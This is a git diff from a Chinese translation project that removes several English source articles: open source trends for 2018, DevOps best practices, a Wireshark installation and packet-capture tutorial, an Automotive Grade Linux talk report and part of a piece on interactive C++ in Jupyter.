in 2018\. Several greenfield areas, such as data preparation, integration, algorithm selection, training methodology selection, and model creation are all set for big-time enhancements through the infusion of machine learning. - -New open source intelligent solutions are set to change the way people interact with systems and transform the very nature of work. - -* Conversational platforms, such as chatbots, make the question-and-command experience, where a user asks a question and the platform responds, the default medium of interacting with machines. - -* Autonomous vehicles and drones, fancy fads today, are expected to become commonplace by 2018. - -* The scope of immersive experience will expand beyond video games and apply to real-life scenarios such as design, training, and visualization processes. - -### 8\. Blockchain becomes mainstream - -Blockchain has come a long way from Bitcoin. The technology is already in widespread use in finance, secure voting, authenticating academic credentials, and more. In the coming year, healthcare, manufacturing, supply chain logistics, and government services are among the sectors most likely to embrace blockchain technology. - -Blockchain distributes digital information. The information resides on millions of nodes, in shared and reconciled databases. The fact that it's not controlled by any single authority and has no single point of failure makes it very robust, transparent, and incorruptible. It also solves the threat of a middleman manipulating the data. Such inherent strengths account for blockchain's soaring popularity and explain why it is likely to emerge as a mainstream technology in the immediate future. - -### 9\. Cognitive cloud moves to center stage - -Cognitive technologies, such as machine learning and artificial intelligence, are increasingly used to reduce complexity and personalize experiences across multiple sectors. One case in point is gamification apps in the financial sector, which offer investors critical investment insights and reduce the complexities of investment models. Digital trust platforms reduce the identity-verification process for financial institutions by about 80%, improving compliance and reducing chances of fraud. - -Such cognitive cloud technologies are now moving to the cloud, making it even more potent and powerful. IBM Watson is the most well-known example of the cognitive cloud in action. IBM's UIMA architecture was made open source and is maintained by the Apache Foundation. DARPA's DeepDive project mirrors Watson's machine learning abilities to enhance decision-making capabilities over time by learning from human interactions. OpenCog, another open source platform, allows developers and data scientists to develop artificial intelligence apps and programs. - -Considering the high stakes of delivering powerful and customized experiences, these cognitive cloud platforms are set to take center stage over the coming year. - -### 10\. The Internet of Things connects more things - -At its core, the Internet of Things (IoT) is the interconnection of devices through embedded sensors or other computing devices that enable the devices (the "things") to send and receive data. IoT is already predicted to be the next big major disruptor of the tech space, but IoT itself is in a continuous state of flux. - -One innovation likely to gain widespread acceptance within the IoT space is Autonomous Decentralized Peer-to-Peer Telemetry ([ADEPT][20]), which is propelled by IBM and Samsung. It uses a blockchain-type technology to deliver a decentralized network of IoT devices. Freedom from a central control system facilitates autonomous communications between "things" in order to manage software updates, resolve bugs, manage energy, and more. - -### Open source drives innovation - -Digital disruption is the norm in today's tech-centric era. Within the technology space, open source is now pervasive, and in 2018, it will be the driving force behind most of the technology innovations. - -Which open source trends and technologies would you add to this list? Let us know in the comments. - -### Topics - - [Business][25][Yearbook][26][2017 Open Source Yearbook][27] - -### About the author - - [![Sreejith@Fingent](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/sreejith.jpg?itok=sdYNV49V)][21] Sreejith - I have been programming since 2000, and professionally since 2007\. I currently lead the Open Source team at [Fingent][6] as we work on different technology stacks, ranging from the "boring"(read tried and trusted) to the bleeding edge. I like building, tinkering with and breaking things, not necessarily in that order. Hit me up at: [https://www.linkedin.com/in/futuregeek/][7][More about me][8] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/10-open-source-technology-trends-2018 - -作者:[Sreejith ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/sreejith -[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ -[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ -[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ -[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ -[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I -[6]:https://www.fingent.com/ -[7]:https://www.linkedin.com/in/futuregeek/ -[8]:https://opensource.com/users/sreejith -[9]:https://opensource.com/user/185026/feed -[10]:https://www.flickr.com/photos/mitchell3417/9206373620 -[11]:https://creativecommons.org/licenses/by-sa/4.0/ -[12]:https://www.openstack.org/ -[13]:https://developers.google.com/web/progressive-web-apps/ -[14]:https://www.rust-lang.org/ -[15]:https://en.wikipedia.org/wiki/Pwn2Own -[16]:https://en.wikipedia.org/wiki/R_(programming_language) -[17]:https://en.wikipedia.org/wiki/S_(programming_language) -[18]:https://opensource.com/tags/artificial-intelligence -[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/ -[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/ -[21]:https://opensource.com/users/sreejith -[22]:https://opensource.com/users/sreejith -[23]:https://opensource.com/users/sreejith -[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments -[25]:https://opensource.com/tags/business -[26]:https://opensource.com/tags/yearbook -[27]:https://opensource.com/yearbook/2017 diff --git a/sources/tech/20171129 5 best practices for getting started with DevOps.md b/sources/tech/20171129 5 best practices for getting started with DevOps.md deleted file mode 100644 index 962f37aaf4..0000000000 --- a/sources/tech/20171129 5 best practices for getting started with DevOps.md +++ /dev/null @@ -1,94 +0,0 @@ -5 best practices for getting started with DevOps -============================================================ - -### Are you ready to implement DevOps, but don't know where to begin? Try these five best practices. - - -![5 best practices for getting started with DevOps](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/devops-gears.png?itok=rUejbLQX "5 best practices for getting started with DevOps") -Image by :  - -[Andrew Magill][8]. Modified by Opensource.com. [CC BY 4.0][9] - -DevOps often stymies early adopters with its ambiguity, not to mention its depth and breadth. By the time someone buys into the idea of DevOps, their first questions usually are: "How do I get started?" and "How do I measure success?" These five best practices are a great road map to starting your DevOps journey. - -### 1\. Measure all the things - -You don't know for sure that your efforts are even making things better unless you can quantify the outcomes. Are my features getting out to customers more rapidly? Are fewer defects escaping to them? Are we responding to and recovering more quickly from failure? - -Before you change anything, think about what kinds of outcomes you expect from your DevOps transformation. When you're further into your DevOps journey, you'll enjoy a rich array of near-real-time reports on everything about your service. But consider starting with these two metrics: - -* **Time to market** measures the end-to-end, often customer-facing, business experience. It usually begins when a feature is formally conceived and ends when the customer can consume the feature in production. Time to market is not mainly an engineering team metric; more importantly it shows your business' complete end-to-end efficiency in bringing valuable new features to market and isolates opportunities for system-wide improvement. - -* **Cycle time** measures the engineering team process. Once work on a new feature starts, when does it become available in production? This metric is very useful for understanding the efficiency of the engineering team and isolating opportunities for team-level improvement. - -### 2\. Get your process off the ground - -DevOps success requires an organization to put a regular (and hopefully effective) process in place and relentlessly improve upon it. It doesn't have to start out being effective, but it must be a regular process. Usually that it's some flavor of agile methodology like Scrum or Scrumban; sometimes it's a Lean derivative. Whichever way you go, pick a formal process, start using it, and get the basics right. - -Regular inspect-and-adapt behaviors are key to your DevOps success. Make good use of opportunities like the stakeholder demo, team retrospectives, and daily standups to find opportunities to improve your process. - -A lot of your DevOps success hinges on people working effectively together. People on a team need to work from a common process that they are empowered to improve upon. They also need regular opportunities to share what they are learning with other stakeholders, both upstream and downstream, in the process. - -Good process discipline will help your organization consume the other benefits of DevOps at the great speed that comes as your success builds. - -Although it's common for more development-oriented teams to successfully adopt processes like Scrum, operations-focused teams (or others that are more interrupt-driven) may opt for a process with a more near-term commitment horizon, such as Kanban. - -### 3\. Visualize your end-to-end workflow - -There is tremendous power in being able to see who's working on what part of your service at any given time. Visualizing your workflow will help people know what they need to work on next, how much work is in progress, and where the bottlenecks are in the process. - -You can't effectively limit work in process until you can see it and quantify it. Likewise, you can't effectively eliminate bottlenecks until you can clearly see them. - -Visualizing the entire workflow will help people in all parts of the organization understand how their work contributes to the success of the whole. It can catalyze relationship-building across organizational boundaries to help your teams collaborate more effectively towards a shared sense of success. - -### 4\. Continuous all the things - -DevOps promises a dizzying array of compelling automation. But Rome wasn't built in a day. One of the first areas you can focus your efforts on is [continuous integration][10] (CI). But don't stop there; you'll want to follow quickly with [continuous delivery][11] (CD) and eventually continuous deployment. - -Your CD pipeline is your opportunity to inject all manner of automated quality testing into your process. The moment new code is committed, your CD pipeline should run a battery of tests against the code and the successfully built artifact. The artifact that comes out at the end of this gauntlet is what progresses along your process until eventually it's seen by customers in production. - -Another "continuous" that doesn't get enough attention is continuous improvement. That's as simple as setting some time aside each day to ask your colleagues: "What small thing can we do today to get better at how we do our work?" These small, daily changes compound over time into more profound results. You'll be pleasantly surprised! But it also gets people thinking all the time about how to improve things. - -### 5\. Gherkinize - -Fostering more effective communication across your organization is crucial to fostering the sort of systems thinking prevalent in successful DevOps journeys. One way to help that along is to use a shared language between the business and the engineers to express the desired acceptance criteria for new features. A good product manager can learn [Gherkin][12] in a day and begin using it to express acceptance criteria in an unambiguous, structured form of plain English. Engineers can use this Gherkinized acceptance criteria to write acceptance tests against the criteria, and then develop their feature code until the tests pass. This is a simplification of [acceptance test-driven development][13](ATDD) that can also help kick start your DevOps culture and engineering practice. - -### Start on your journey - -Don't be discouraged by getting started with your DevOps practice. It's a journey. And hopefully these five ideas give you solid ways to get started. - - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot_4.jpg?itok=jntfDCfX)][14] - - Magnus Hedemark - Magnus has been in the IT industry for over 20 years, and a technology enthusiast for most of his life. He's presently Manager of DevOps Engineering at UnitedHealth Group. In his spare time, Magnus enjoys photography and paddling canoes. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/5-keys-get-started-devops - -作者:[Magnus Hedemark ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/magnus919 -[1]:https://opensource.com/tags/devops?src=devops_resource_menu1 -[2]:https://opensource.com/resources/devops?src=devops_resource_menu2 -[3]:https://www.openshift.com/promotions/devops-with-openshift.html?intcmp=7016000000127cYAAQ&src=devops_resource_menu3 -[4]:https://enterprisersproject.com/article/2017/5/9-key-phrases-devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu4 -[5]:https://www.redhat.com/en/insights/devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu5 -[6]:https://opensource.com/article/17/11/5-keys-get-started-devops?rate=oEOzMXx1ghbkfl2a5ae6AnvO88iZ3wzkk53K2CzbDWI -[7]:https://opensource.com/user/25739/feed -[8]:https://ccsearch.creativecommons.org/image/detail/7qRx_yrcN5isTMS0u9iKMA== -[9]:https://creativecommons.org/licenses/by-sa/4.0/ -[10]:https://martinfowler.com/articles/continuousIntegration.html -[11]:https://martinfowler.com/bliki/ContinuousDelivery.html -[12]:https://cucumber.io/docs/reference -[13]:https://en.wikipedia.org/wiki/Acceptance_test%E2%80%93driven_development -[14]:https://opensource.com/users/magnus919 -[15]:https://opensource.com/users/magnus919 -[16]:https://opensource.com/users/magnus919 -[17]:https://opensource.com/tags/devops diff --git a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md b/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md deleted file mode 100644 index d3ba75da14..0000000000 --- a/sources/tech/20171129 How to Install and Use Wireshark on Debian and Ubuntu 16.04_17.10.md +++ /dev/null @@ -1,185 +0,0 @@ -Translating by filefi - - -How to Install and Use Wireshark on Debian 9 / Ubuntu 16.04 / 17.10 -============================================================ - -by [Pradeep Kumar][1] · Published November 29, 2017 · Updated November 29, 2017 - - [![wireshark-Debian-9-Ubuntu 16.04 -17.10](https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Debian-9-Ubuntu-16.04-17.10.jpg)][2] - -Wireshark is free and open source, cross platform, GUI based Network packet analyzer that is available for Linux, Windows, MacOS, Solaris etc. It captures network packets in real time & presents them in human readable format. Wireshark allows us to monitor the network packets up to microscopic level. Wireshark also has a command line utility called ‘tshark‘ that performs the same functions as Wireshark but through terminal & not through GUI. - -Wireshark can be used for network troubleshooting, analyzing, software & communication protocol development & also for education purposed. Wireshark uses a library called ‘pcap‘ for capturing the network packets. - -Wireshark comes with a lot of features & some those features are; - -* Support for a hundreds of protocols for inspection, - -* Ability to capture packets in real time & save them for later offline analysis, - -* A number of filters to analyzing data, - -* Data captured can be compressed & uncompressed on the fly, - -* Various file formats for data analysis supported, output can also be saved to XML, CSV, plain text formats, - -* data can be captured from a number of interfaces like ethernet, wifi, bluetooth, USB, Frame relay , token rings etc. - -In this article, we will discuss how to install Wireshark on Ubuntu/Debain machines & will also learn to use Wireshark for capturing network packets. - -#### Installation of Wireshark on Ubuntu 16.04 / 17.10 - -Wireshark is available with default Ubuntu repositories & can be simply installed using the following command. But there might be chances that you will not get the latest version of wireshark. - -``` -linuxtechi@nixworld:~$ sudo apt-get update -linuxtechi@nixworld:~$ sudo apt-get install wireshark -y -``` - -So to install latest version of wireshark we have to enable or configure official wireshark repository. - -Use the beneath commands one after the another to configure repository and to install latest version of Wireshark utility - -``` -linuxtechi@nixworld:~$ sudo add-apt-repository ppa:wireshark-dev/stable -linuxtechi@nixworld:~$ sudo apt-get update -linuxtechi@nixworld:~$ sudo apt-get install wireshark -y -``` - -Once the Wireshark is installed execute the below command so that non-root users can capture live packets of interfaces, - -``` -linuxtechi@nixworld:~$ sudo setcap 'CAP_NET_RAW+eip CAP_NET_ADMIN+eip' /usr/bin/dumpcap -``` - -#### Installation of Wireshark on Debian 9 - -Wireshark package and its dependencies are already present in the default debian 9 repositories, so to install latest and stable version of Wireshark on Debian 9, use the following command: - -``` -linuxtechi@nixhome:~$ sudo apt-get update -linuxtechi@nixhome:~$ sudo apt-get install wireshark -y -``` - -During the installation, it will prompt us to configure dumpcap for non-superusers, - -Select ‘yes’ and then hit enter. - - [![Configure-Wireshark-Debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Configure-Wireshark-Debian9-1024x542.jpg)][3] - -Once the Installation is completed, execute the below command so that non-root users can also capture the live packets of the interfaces. - -``` -linuxtechi@nixhome:~$ sudo chmod +x /usr/bin/dumpcap -``` - -We can also use the latest source package to install the wireshark on Ubuntu/Debain & many other Linux distributions. - -#### Installing Wireshark using source code on Debian / Ubuntu Systems - -Firstly download the latest source package (which is 2.4.2 at the time for writing this article), use the following command, - -``` -linuxtechi@nixhome:~$ wget https://1.as.dl.wireshark.org/src/wireshark-2.4.2.tar.xz -``` - -Next extract the package & enter into the extracted directory, - -``` -linuxtechi@nixhome:~$ tar -xf wireshark-2.4.2.tar.xz -C /tmp -linuxtechi@nixhome:~$ cd /tmp/wireshark-2.4.2 -``` - -Now we will compile the code with the following commands, - -``` -linuxtechi@nixhome:/tmp/wireshark-2.4.2$ ./configure --enable-setcap-install -linuxtechi@nixhome:/tmp/wireshark-2.4.2$ make -``` - -Lastly install the compiled packages to install Wireshark on the system, - -``` -linuxtechi@nixhome:/tmp/wireshark-2.4.2$ sudo make install -linuxtechi@nixhome:/tmp/wireshark-2.4.2$ sudo ldconfig -``` - -Upon installation a separate group for Wireshark will also be created, we will now add our user to the group so that it can work with wireshark otherwise you might get ‘permission denied‘ error when starting wireshark. - -To add the user to the wireshark group, execute the following command, - -``` -linuxtechi@nixhome:~$ sudo usermod -a -G wireshark linuxtechi -``` - -Now we can start wireshark either from GUI Menu or from terminal with this command, - -``` -linuxtechi@nixhome:~$ wireshark -``` - -#### Access Wireshark on Debian 9 System - - [![Access-wireshark-debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-debian9-1024x664.jpg)][4] - -Click on Wireshark icon - - [![Wireshark-window-debian9](https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-debian9-1024x664.jpg)][5] - -#### Access Wireshark on Ubuntu 16.04 / 17.10 - - [![Access-wireshark-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-Ubuntu-1024x664.jpg)][6] - -Click on Wireshark icon - - [![Wireshark-window-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-Ubuntu-1024x664.jpg)][7] - -#### Capturing and Analyzing packets - -Once the wireshark has been started, we should be presented with the wireshark window, example is shown above for Ubuntu and Debian system. - - [![wireshark-Linux-system](https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Linux-system.jpg)][8] - -All these are the interfaces from where we can capture the network packets. Based on the interfaces you have on your system, this screen might be different for you. - -We are selecting ‘enp0s3’ for capturing the network traffic for that inteface. After selecting the inteface, network packets for all the devices on our network start to populate (refer to screenshot below) - - [![Capturing-Packet-from-enp0s3-Ubuntu-Wireshark](https://www.linuxtechi.com/wp-content/uploads/2017/11/Capturing-Packet-from-enp0s3-Ubuntu-Wireshark-1024x727.jpg)][9] - -First time we see this screen we might get overwhelmed by the data that is presented in this screen & might have thought how to sort out this data but worry not, one the best features of Wireshark is its filters. - -We can sort/filter out the data based on IP address, Port number, can also used source & destination filters, packet size etc & can also combine 2 or more filters together to create more comprehensive searches. We can either write our filters in ‘Apply a Display Filter‘ tab , or we can also select one of already created rules. To select pre-built filter, click on ‘flag‘ icon , next to ‘Apply a Display Filter‘ tab, - - [![Filter-in-wireshark-Ubuntu](https://www.linuxtechi.com/wp-content/uploads/2017/11/Filter-in-wireshark-Ubuntu-1024x727.jpg)][10] - -We can also filter data based on the color coding, By default, light purple is TCP traffic, light blue is UDP traffic, and black identifies packets with errors , to see what these codes mean, click View -> Coloring Rules, also we can change these codes. - - [![Packet-Colouring-Wireshark](https://www.linuxtechi.com/wp-content/uploads/2017/11/Packet-Colouring-Wireshark-1024x682.jpg)][11] - -After we have the results that we need, we can then click on any of the captured packets to get more details about that packet, this will show all the data about that network packet. - -Wireshark is an extremely powerful tool takes some time to getting used to & make a command over it, this tutorial will help you get started. Please feel free to drop in your queries or suggestions in the comment box below. - --------------------------------------------------------------------------------- - -via: https://www.linuxtechi.com - -作者:[Pradeep Kumar][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxtechi.com/author/pradeep/ -[1]:https://www.linuxtechi.com/author/pradeep/ -[2]:https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Debian-9-Ubuntu-16.04-17.10.jpg -[3]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Configure-Wireshark-Debian9.jpg -[4]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-debian9.jpg -[5]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-debian9.jpg -[6]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Access-wireshark-Ubuntu.jpg -[7]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Wireshark-window-Ubuntu.jpg -[8]:https://www.linuxtechi.com/wp-content/uploads/2017/11/wireshark-Linux-system.jpg -[9]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Capturing-Packet-from-enp0s3-Ubuntu-Wireshark.jpg -[10]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Filter-in-wireshark-Ubuntu.jpg -[11]:https://www.linuxtechi.com/wp-content/uploads/2017/11/Packet-Colouring-Wireshark.jpg diff --git a/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md b/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md deleted file mode 100644 index 9eee39888a..0000000000 --- a/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md +++ /dev/null @@ -1,70 +0,0 @@ -Inside AGL: Familiar Open Source Components Ease Learning Curve -============================================================ - -![Matt Porter](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/porter-elce-agl.png?itok=E-5xG98S "Matt Porter") -Konsulko’s Matt Porter (pictured) and Scott Murray ran through the major components of the AGL’s Unified Code Base at Embedded Linux Conference Europe.[The Linux Foundation][1] - -Among the sessions at the recent [Embedded Linux Conference Europe (ELCE)][5] — 57 of which are [available on YouTube][2] -- are several reports on the Linux Foundation’s [Automotive Grade Linux project][6]. These include [an overview from AGL Community Manager Walt Miner ][3]showing how AGL’s Unified Code Base (UCB) Linux distribution is expanding from in-vehicle infotainment (IVI) to ADAS. There was even a presentation on using AGL to build a remote-controlled robot (see links below). - -Here we look at the “State of AGL: Plumbing and Services,” from Konsulko Group’s CTO Matt Porter and senior staff software engineer Scott Murray. Porter and Murray ran through the components of the current [UCB 4.0 “Daring Dab”][7] and detailed major upstream components and API bindings, many of which will be appear in the Electric Eel release due in Jan. 2018. - -Despite the automotive focus of the AGL stack, most of the components are already familiar to Linux developers. “It looks a lot like a desktop distro,” Porter told the ELCE attendees in Prague. “All these familiar friends.” - -Some of those friends include the underlying Yocto Project “Poky” with OpenEmbedded foundation, which is topped with layers like oe-core, meta-openembedded, and metanetworking. Other components are based on familiar open source software like systemd (application control), Wayland and Weston (graphics), BlueZ (Bluetooth), oFono (telephony), PulseAudio and ALSA (audio), gpsd (location), ConnMan (Internet), and wpa-supplicant (WiFi), among others. - -UCB’s application framework is controlled through a WebSocket interface to the API bindings, thereby enabling apps to talk to each other. There’s also a new W3C widget for an alternative application packaging scheme, as well as support for SmartDeviceLink, a technology developed at Ford that automatically syncs up IVI systems with mobile phones.  - -AGL UCB’s Wayland/Weston graphics layer is augmented with an “IVI shell” that works with the layer manager. “One of the unique requirements of automotive is the ability to separate aspects of the application in the layers,” said Porter. “For example, in a navigation app, the graphics rendering for the map may be completely different than the engine used for the UI decorations. One engine layers to a surface in Wayland to expose the map while the decorations and controls are handled by another layer.” - -For audio, ALSA and PulseAudio are joined by GENIVI AudioManager, which works together with PulseAudio. “We use AudioManager for policy driven audio routing,” explained Porter. “It allows you to write a very complex XML-based policy using a rules engine with audio routing.” - -UCB leans primarily on the well-known [Smack Project][8] for security, and also incorporates Tizen’s [Cynara][9] safe policy-checker service. A Cynara-enabled D-Bus daemon is used to control Cynara security policies. - -Porter and Murray went on to explain AGL’s API binding mechanism, which according to Murray “abstracts the UI from its back-end logic so you can replace it with your own custom UI.” You can re-use application logic with different UI implementations, such as moving from the default Qt to HTML5 or a native toolkit. Application binding requests and responses use JSON via HTTP or WebSocket. Binding calls can be made from applications or from other bindings, thereby enabling “stacking” of bindings. - -Porter and Murray concluded with a detailed description of each binding. These include upstream bindings currently in various stages of development. The first is a Master binding that manages the application lifecycle, including tasks such as install, uninstall, start, and terminate. Other upstream bindings include the WiFi binding and the BlueZ-based Bluetooth binding, which in the future will be upgraded with Bluetooth [PBAP][10] (Phone Book Access Profile). PBAP can connect with contacts databases on your phone, and links to the Telephony binding to replicate caller ID. - -The oFono-based Telephony binding also makes calls to the Bluetooth binding for Bluetooth Hands-Free-Profile (HFP) support. In the future, Telephony binding will add support for sent dial tones, call waiting, call forwarding, and voice modem support. - -Support for AM/FM radio is not well developed in the Linux world, so for its Radio binding, AGL started by supporting [RTL-SDR][11] code for low-end radio dongles. Future plans call for supporting specific automotive tuner devices. - -The MediaPlayer binding is in very early development, and is currently limited to GStreamer based audio playback and control. Future plans call for adding playlist controls, as well as one of the most actively sought features among manufacturers: video playback support. - -Location bindings include the [gpsd][12] based GPS binding, as well as GeoClue and GeoFence. GeoClue, which is built around the [GeoClue][13] D-Bus geolocation service, “overlaps a little with GPS, which uses the same location data,” says Porter. GeoClue also gathers location data from WiFi AP databases, 3G/4G tower info, and the GeoIP database — sources that are useful “if you’re inside or don’t have a good fix,” he added. - -GeoFence depends on the GPS binding, as well. It lets you establish a bounding box, and then track ingress and egress events. GeoFence also tracks “dwell” status, which is determined by arriving at home and staying for 10 minutes. “It then triggers some behavior based on a timeout,” said Porter. Future plans call for a customizable dwell transition time. - -While most of these Upstream bindings are well established, there are also Work in Progress (WIP) bindings that are still in the early stages, including CAN, HomeScreen, and WindowManager bindings. Farther out, there are plans to add speech recognition and text-to-speech bindings, as well as a WWAN modem binding. - -In conclusion, Porter noted: “Like any open source project, we desperately need more developers.” The Automotive Grade Linux project may seem peripheral to some developers, but it offers a nice mix of familiarity — grounded in many widely used open source projects -- along with the excitement of expanding into a new and potentially game changing computing form factor: your automobile. AGL has also demonstrated success — you can now [check out AGL in action in the 2018 Toyota Camry][14], followed in the coming month by most Toyota and Lexus vehicles sold in North America. - -Watch the complete video below: - -[视频][15] - --------------------------------------------------------------------------------- - -via: https://www.linux.com/blog/event/elce/2017/11/inside-agl-familiar-open-source-components-ease-learning-curve - -作者:[ ERIC BROWN][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/ericstephenbrown -[1]:https://www.linux.com/licenses/category/linux-foundation -[2]:https://www.youtube.com/playlist?list=PLbzoR-pLrL6pISWAq-1cXP4_UZAyRtesk -[3]:https://www.youtube.com/watch?v=kfwEmjSjAzM&index=14&list=PLbzoR-pLrL6pISWAq-1cXP4_UZAyRtesk -[4]:https://www.linux.com/files/images/porter-elce-aglpng -[5]:http://events.linuxfoundation.org/events/embedded-linux-conference-europe -[6]:https://www.automotivelinux.org/ -[7]:https://www.linux.com/blog/2017/8/automotive-grade-linux-moves-ucb-40-launches-virtualization-workgroup -[8]:http://schaufler-ca.com/ -[9]:https://wiki.tizen.org/Security:Cynara -[10]:https://wiki.maemo.org/Bluetooth_PBAP -[11]:https://www.rtl-sdr.com/about-rtl-sdr/ -[12]:http://www.catb.org/gpsd/ -[13]:https://www.freedesktop.org/wiki/Software/GeoClue/ -[14]:https://www.linux.com/blog/event/automotive-linux-summit/2017/6/linux-rolls-out-toyota-and-lexus-vehicles -[15]:https://youtu.be/RgI-g5h1t8I diff --git a/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md b/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md deleted file mode 100644 index 395c901618..0000000000 --- a/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md +++ /dev/null @@ -1,301 +0,0 @@ -Interactive Workflows for C++ with Jupyter -============================================================ - -Scientists, educators and engineers not only use programming languages to build software systems, but also in interactive workflows, using the tools available to  _explore _ a problem and  _reason _ about it. - -Running some code, looking at a visualization, loading data, and running more code. Quick iteration is especially important during the exploratory phase of a project. - -For this kind of workflow, users of the C++ programming language currently have no choice but to use a heterogeneous set of tools that don’t play well with each other, making the whole process cumbersome, and difficult to reproduce. - - _We currently lack a good story for interactive computing in C++_ . - -In our opinion, this hurts the productivity of C++ developers: - -* Most of the progress made in software projects comes from incrementalism. Obstacles to fast iteration hinder progress. - -* This also makes C++ more difficult to teach. The first hours of a C++ class are rarely rewarding as the students must learn how to set up a small project before writing any code. And then, a lot more time is required before their work can result in any visual outcome. - -### Project Jupyter and Interactive Computing - - - -![](https://cdn-images-1.medium.com/max/1200/1*wOHyKy6fl3ltcBMNpCvC6Q.png) - -The goal of Project Jupyter is to provide a consistent set of tools for scientific computing and data science workflows, from the exploratory phase of the analysis to the presentation and the sharing of the results. The Jupyter stack was designed to be agnostic of the programming language, and also to allow alternative implementations of any component of the layered architecture (back-ends for programming languages, custom renderers for file types associated with Jupyter). The stack consists of - -* a low-level specification for messaging protocols, standardized file formats, - -* a reference implementation of these standards, - -* applications built on the top of these libraries: the Notebook, JupyterLab, Binder, JupyterHub - -* and visualization libraries integrated into the Notebook and JupyterLab. - -Adoption of the Jupyter ecosystem has skyrocketed in the past years, with millions of users worldwide, over a million Jupyter notebooks shared on GitHub and large-scale deployments of Jupyter in universities, companies and high-performance computing centers. - -### Jupyter and C++ - -One of the main extension points of the Jupyter stack is the  _kernel_ , the part of the infrastructure responsible for executing the user’s code. Jupyter kernels exist for [numerous programming languages][14]. - -Most Jupyter kernels are implemented in the target programming language: the reference implementation [ipykernel][15] in Python, [IJulia][16] in Julia, leading to a duplication of effort for the implementation of the protocol. A common denominator to a lot of these interpreted languages is that the interpreter generally exposes a C API, allowing the embedding into a native application. In an effort to consolidate these commonalities and save work for future kernel builders, we developed  _xeus_ . - - - -![](https://cdn-images-1.medium.com/max/1200/1*TKrPv5AvFM3NJ6a7VMu8Tw.png) - -[Xeus ][17]is a C++ implementation of the Jupyter kernel protocol. It is not a kernel itself but a library that facilitates the authoring of kernels, and other applications making use of the Jupyter kernel protocol. - -A typical kernel implementation using xeus would in fact make use of the target interpreter _ as a library._ - -There are a number of benefits of using xeus over implementing your kernel in the target language: - -* Xeus provides a complete implementation of the protocol, enabling a lot of features from the start for kernel authors, who only need to deal with the language bindings. - -* Xeus-based kernels can very easily provide a back-end for Jupyter interactive widgets. - -* Finally, xeus can be used to implement kernels for domain-specific languages such as SQL flavors. Existing approaches use a Python wrapper. With xeus, the resulting kernel won't require Python at run-time, leading to large performance benefits. - - - -![](https://cdn-images-1.medium.com/max/1200/1*Cr_cfHdrgFXHlO15qdNK7w.png) - -Interpreted C++ is already a reality at CERN with the [Cling][18]C++ interpreter in the context of the [ROOT][19] data analysis environment. - -As a first example for a kernel based on xeus, we have implemented [xeus-cling][20], a pure C++ kernel. - - - -![](https://cdn-images-1.medium.com/max/1600/1*NnjISpzZtpy5TOurg0S89A.gif) -Redirection of outputs to the Jupyter front-end, with different styling in the front-end. - -Complex features of the C++ programming language such as, polymorphism, templates, lambdas, are supported by the cling interpreter, making the C++ Jupyter notebook a great prototyping and learning platform for the C++ users. See the image below for a demonstration: - - - -![](https://cdn-images-1.medium.com/max/1600/1*lGVLY4fL1ytMfT-eWtoXkw.gif) -Features of the C++ programming language supported by the cling interpreter - -Finally, xeus-cling supports live quick-help, fetching the content on [cppreference][21] in the case of the standard library. - - - 